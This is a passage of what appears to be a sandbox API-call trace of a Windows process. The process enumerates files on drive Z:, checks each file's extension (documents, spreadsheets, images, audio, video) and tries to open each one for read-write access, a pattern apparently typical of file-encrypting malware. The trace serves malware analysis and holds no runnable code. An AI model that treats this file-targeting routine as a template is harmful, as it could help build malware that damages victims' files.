(lpFileName="Z:\\ppEQNd41NzmPglbQ.ppt" (normalized: "z:\\ppeqnd41nzmpglbq.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.838] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x181da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4Qalr2j5fIEqdQ0.swf", cAlternateFileName="")) returned 1 [0185.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.838] PathFindExtensionW (pszPath="Z:\\4Qalr2j5fIEqdQ0.swf") returned=".swf" [0185.843] CreateFileW (lpFileName="Z:\\4Qalr2j5fIEqdQ0.swf" (normalized: "z:\\4qalr2j5fieqdq0.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.845] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17557, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NZjMmNKkZjRI.png", cAlternateFileName="")) returned 1 [0185.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.845] PathFindExtensionW (pszPath="Z:\\NZjMmNKkZjRI.png") returned=".png" [0185.850] CreateFileW (lpFileName="Z:\\NZjMmNKkZjRI.png" (normalized: "z:\\nzjmmnkkzjri.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.852] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x120f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2f5wUY1aFYJTCEwR.odp", cAlternateFileName="")) returned 1 [0185.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.852] PathFindExtensionW (pszPath="Z:\\2f5wUY1aFYJTCEwR.odp") returned=".odp" [0185.857] CreateFileW (lpFileName="Z:\\2f5wUY1aFYJTCEwR.odp" (normalized: "z:\\2f5wuy1afyjtcewr.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.859] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa155, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tdyTR6vSlTZHl.m4a", cAlternateFileName="")) returned 1 [0185.859] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.859] PathFindExtensionW (pszPath="Z:\\tdyTR6vSlTZHl.m4a") returned=".m4a" [0185.864] CreateFileW (lpFileName="Z:\\tdyTR6vSlTZHl.m4a" (normalized: "z:\\tdytr6vsltzhl.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.866] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x80b4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GCXxiNbD.avi", cAlternateFileName="")) returned 1 [0185.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.866] PathFindExtensionW (pszPath="Z:\\GCXxiNbD.avi") returned=".avi" [0185.871] CreateFileW (lpFileName="Z:\\GCXxiNbD.avi" (normalized: "z:\\gcxxinbd.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.874] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x5791, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KwuGmh9JdfDxPED09.jpg", cAlternateFileName="")) returned 1 [0185.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0185.874] PathFindExtensionW (pszPath="Z:\\KwuGmh9JdfDxPED09.jpg") returned=".jpg" [0185.879] CreateFileW (lpFileName="Z:\\KwuGmh9JdfDxPED09.jpg" (normalized: "z:\\kwugmh9jdfdxped09.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0185.881] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x88b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7ZwyeX1xh.doc", cAlternateFileName="")) returned 1 [0185.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.881] PathFindExtensionW (pszPath="Z:\\7ZwyeX1xh.doc") returned=".doc" [0185.887] CreateFileW (lpFileName="Z:\\7ZwyeX1xh.doc" (normalized: "z:\\7zwyex1xh.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.889] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13e67, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EkCDp.xls", cAlternateFileName="")) returned 1 [0185.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.889] PathFindExtensionW (pszPath="Z:\\EkCDp.xls") returned=".xls" [0185.894] CreateFileW (lpFileName="Z:\\EkCDp.xls" (normalized: "z:\\ekcdp.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.896] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11ca8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="p2b1gzQI.xls", cAlternateFileName="")) returned 1 [0185.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.896] PathFindExtensionW (pszPath="Z:\\p2b1gzQI.xls") returned=".xls" [0185.900] CreateFileW (lpFileName="Z:\\p2b1gzQI.xls" (normalized: "z:\\p2b1gzqi.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.902] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa169, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VF8E6ekoFe4DVWHEy.flv", cAlternateFileName="")) returned 1 [0185.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0185.902] PathFindExtensionW (pszPath="Z:\\VF8E6ekoFe4DVWHEy.flv") returned=".flv" [0185.906] CreateFileW (lpFileName="Z:\\VF8E6ekoFe4DVWHEy.flv" (normalized: "z:\\vf8e6ekofe4dvwhey.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0185.907] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x8136, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SSKEoPSkeN.jpg", cAlternateFileName="")) returned 1 [0185.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.908] PathFindExtensionW (pszPath="Z:\\SSKEoPSkeN.jpg") returned=".jpg" [0185.912] CreateFileW (lpFileName="Z:\\SSKEoPSkeN.jpg" (normalized: "z:\\sskeopsken.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.913] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x10e96, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qWCrNc.m4a", cAlternateFileName="")) returned 1 [0185.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.914] PathFindExtensionW (pszPath="Z:\\qWCrNc.m4a") returned=".m4a" [0185.918] CreateFileW (lpFileName="Z:\\qWCrNc.m4a" (normalized: "z:\\qwcrnc.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.919] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc700, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cgtqEFU0PAhrauJ.ods", cAlternateFileName="")) returned 1 [0185.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.919] PathFindExtensionW (pszPath="Z:\\cgtqEFU0PAhrauJ.ods") returned=".ods" [0185.924] CreateFileW (lpFileName="Z:\\cgtqEFU0PAhrauJ.ods" (normalized: "z:\\cgtqefu0pahrauj.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.925] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x6539, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z1vXQLb4e3vCWmHziUz.mkv", cAlternateFileName="")) returned 1 [0185.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0185.926] PathFindExtensionW (pszPath="Z:\\Z1vXQLb4e3vCWmHziUz.mkv") returned=".mkv" [0185.930] CreateFileW (lpFileName="Z:\\Z1vXQLb4e3vCWmHziUz.mkv" (normalized: "z:\\z1vxqlb4e3vcwmhziuz.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0185.931] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x80d2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U3BnARny7QLta.mp4", cAlternateFileName="")) returned 1 [0185.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.931] PathFindExtensionW (pszPath="Z:\\U3BnARny7QLta.mp4") returned=".mp4" [0185.935] CreateFileW (lpFileName="Z:\\U3BnARny7QLta.mp4" (normalized: "z:\\u3bnarny7qlta.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.939] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x16804, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7jSTZlo2FBO75BUO.wav", cAlternateFileName="")) returned 1 [0185.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.939] PathFindExtensionW (pszPath="Z:\\7jSTZlo2FBO75BUO.wav") returned=".wav" [0185.943] CreateFileW (lpFileName="Z:\\7jSTZlo2FBO75BUO.wav" (normalized: "z:\\7jstzlo2fbo75buo.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.945] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ceffa, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x176d6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OxtG5eiXbm.xls", cAlternateFileName="")) returned 1 [0185.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.945] PathFindExtensionW (pszPath="Z:\\OxtG5eiXbm.xls") returned=".xls" [0185.949] CreateFileW (lpFileName="Z:\\OxtG5eiXbm.xls" (normalized: "z:\\oxtg5eixbm.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.951] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa2dc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sAXOlTuEN.odt", cAlternateFileName="")) returned 1 [0185.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.951] PathFindExtensionW (pszPath="Z:\\sAXOlTuEN.odt") returned=".odt" [0185.955] CreateFileW (lpFileName="Z:\\sAXOlTuEN.odt" (normalized: "z:\\saxoltuen.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.957] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x185b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S1VrbK55Uey.bmp", cAlternateFileName="")) returned 1 [0185.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.957] PathFindExtensionW (pszPath="Z:\\S1VrbK55Uey.bmp") returned=".bmp" [0185.962] CreateFileW (lpFileName="Z:\\S1VrbK55Uey.bmp" (normalized: "z:\\s1vrbk55uey.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.963] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x8235, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DWHuuMWix2.flv", cAlternateFileName="")) returned 1 [0185.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.963] PathFindExtensionW (pszPath="Z:\\DWHuuMWix2.flv") returned=".flv" [0185.968] CreateFileW (lpFileName="Z:\\DWHuuMWix2.flv" (normalized: "z:\\dwhuumwix2.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.969] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12c0e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fUsEMWHFeMlUg8RpMG.ots", cAlternateFileName="")) returned 1 [0185.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0185.970] PathFindExtensionW (pszPath="Z:\\fUsEMWHFeMlUg8RpMG.ots") returned=".ots" [0185.975] CreateFileW (lpFileName="Z:\\fUsEMWHFeMlUg8RpMG.ots" (normalized: "z:\\fusemwhfemlug8rpmg.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0185.977] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x10386, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F4BCJQiL.ots", cAlternateFileName="")) returned 1 [0185.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.977] PathFindExtensionW (pszPath="Z:\\F4BCJQiL.ots") returned=".ots" [0185.981] CreateFileW (lpFileName="Z:\\F4BCJQiL.ots" (normalized: "z:\\f4bcjqil.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.983] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, 